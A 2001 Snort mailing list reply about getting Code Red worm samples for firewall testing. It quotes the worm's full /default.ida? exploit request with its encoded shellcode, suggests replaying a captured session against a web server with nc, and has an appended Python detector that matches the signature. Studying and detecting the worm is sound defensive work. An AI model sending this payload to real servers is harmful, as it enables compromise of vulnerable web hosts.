Snort mailing list archives

Re: Where to get " code red worm source" ?


From: Phil Wood <cpw () lanl gov>
Date: Wed, 29 Aug 2001 11:50:49 -0600

On Wed, Aug 29, 2001 at 01:44:33PM +0900, ls1100 wrote:

> I'd like to test my own Linux firewalls using iptables against the Code Red worm.
>
> Anybody know where to get the "code red worm source"?

What I do is just run:

  tcpdump -s 1518 -w codeRed -c 100 dst net mynet and dst port 80

In less than a second, I have 5 examples.  Each one has the following
"string" among other things:

GET 
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
  HTTP/1.0

Since 8/13 we have had roughly 25+ million codereds.  Today (last 11 hours and
39 minutes) we have had 878,589.

I just don't see how you could miss getting one for yourself. %^)

I extracted one of the "sessions" in binary which you could pipe to a web
server using nc.




-- 
Phil Wood, cpw () lanl gov

Attachment: cr.bin
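Added example, not part of the original post or of any tool it mentions: a small detector that applies the request signature quoted above to captured HTTP request lines, so a defender can tally Code Red probes per source the way the post does without ever replaying the payload. The X filler is the variant shown in the post; the pattern also accepts the run of N characters used by the later Code Red II variant (my generalization). The sample requests, IP addresses (documentation ranges) and the `first_request_line` helper are constructed for the example; the payload string is the one quoted in the post.

```python
import re
from collections import Counter

# Added example (not part of the original post). Signature of the Code Red
# probe quoted above: a GET for /default.ida? followed by a long run of one
# filler character and then a %uXXXX-encoded payload. The X filler is the
# variant shown in the post; the later Code Red II variant used a run of N
# characters, so the pattern accepts either (assumption: 100+ filler chars).
CODE_RED_RE = re.compile(
    r"^GET\s+/default\.ida\?(?:X{100,}|N{100,})(?:%u[0-9a-fA-F]{4})+"
)


def first_request_line(payload):
    """Return the HTTP request line from the start of a captured TCP payload
    (bytes, as a tcpdump capture would hold it), decoded leniently."""
    return payload.split(b"\r\n", 1)[0].decode("latin-1", errors="replace")


def is_code_red_request(request_line):
    """True if the request line matches the Code Red probe signature."""
    return CODE_RED_RE.match(request_line.strip()) is not None


def scan_requests(requests):
    """requests: iterable of (source_ip, request_line). Returns the source IP
    of every request that matched, one entry per matching request."""
    return [src for src, line in requests if is_code_red_request(line)]


def count_by_source(requests):
    """Per-source hit counts, the kind of tally the post reports."""
    return Counter(scan_requests(requests))


# Constructed sample traffic (documentation IP ranges, not real hosts).
# The payload string is the one quoted in the post.
_CR_PAYLOAD = ("%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858"
               "%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff"
               "%u0078%u0000%u00=a")
CODE_RED_X = "GET /default.ida?" + "X" * 224 + _CR_PAYLOAD + " HTTP/1.0"
CODE_RED_N = "GET /default.ida?" + "N" * 224 + _CR_PAYLOAD + " HTTP/1.0"

SAMPLE_REQUESTS = [
    ("198.51.100.7", CODE_RED_X),
    ("203.0.113.4", "GET /index.html HTTP/1.0"),
    ("198.51.100.7", CODE_RED_X),
    ("192.0.2.9", CODE_RED_N),
    ("203.0.113.4", "GET /default.ida HTTP/1.0"),  # no filler/payload: not a hit
]

# A constructed TCP payload as it would appear at the start of a captured session.
SAMPLE_PAYLOAD = (CODE_RED_X + "\r\nHost: example.test\r\n\r\n").encode("latin-1")

if __name__ == "__main__":
    for src, n in count_by_source(SAMPLE_REQUESTS).items():
        print(f"{src}: {n} Code Red request(s)")
    print("raw payload matched:",
          is_code_red_request(first_request_line(SAMPLE_PAYLOAD)))
```

The same literal, `/default.ida?` followed by the `%u9090%u6858` encoding, is what a content match in an IDS rule or a web-server log search would key on; matching on the request line rather than on the whole payload keeps the check cheap enough to run over the volumes the post describes.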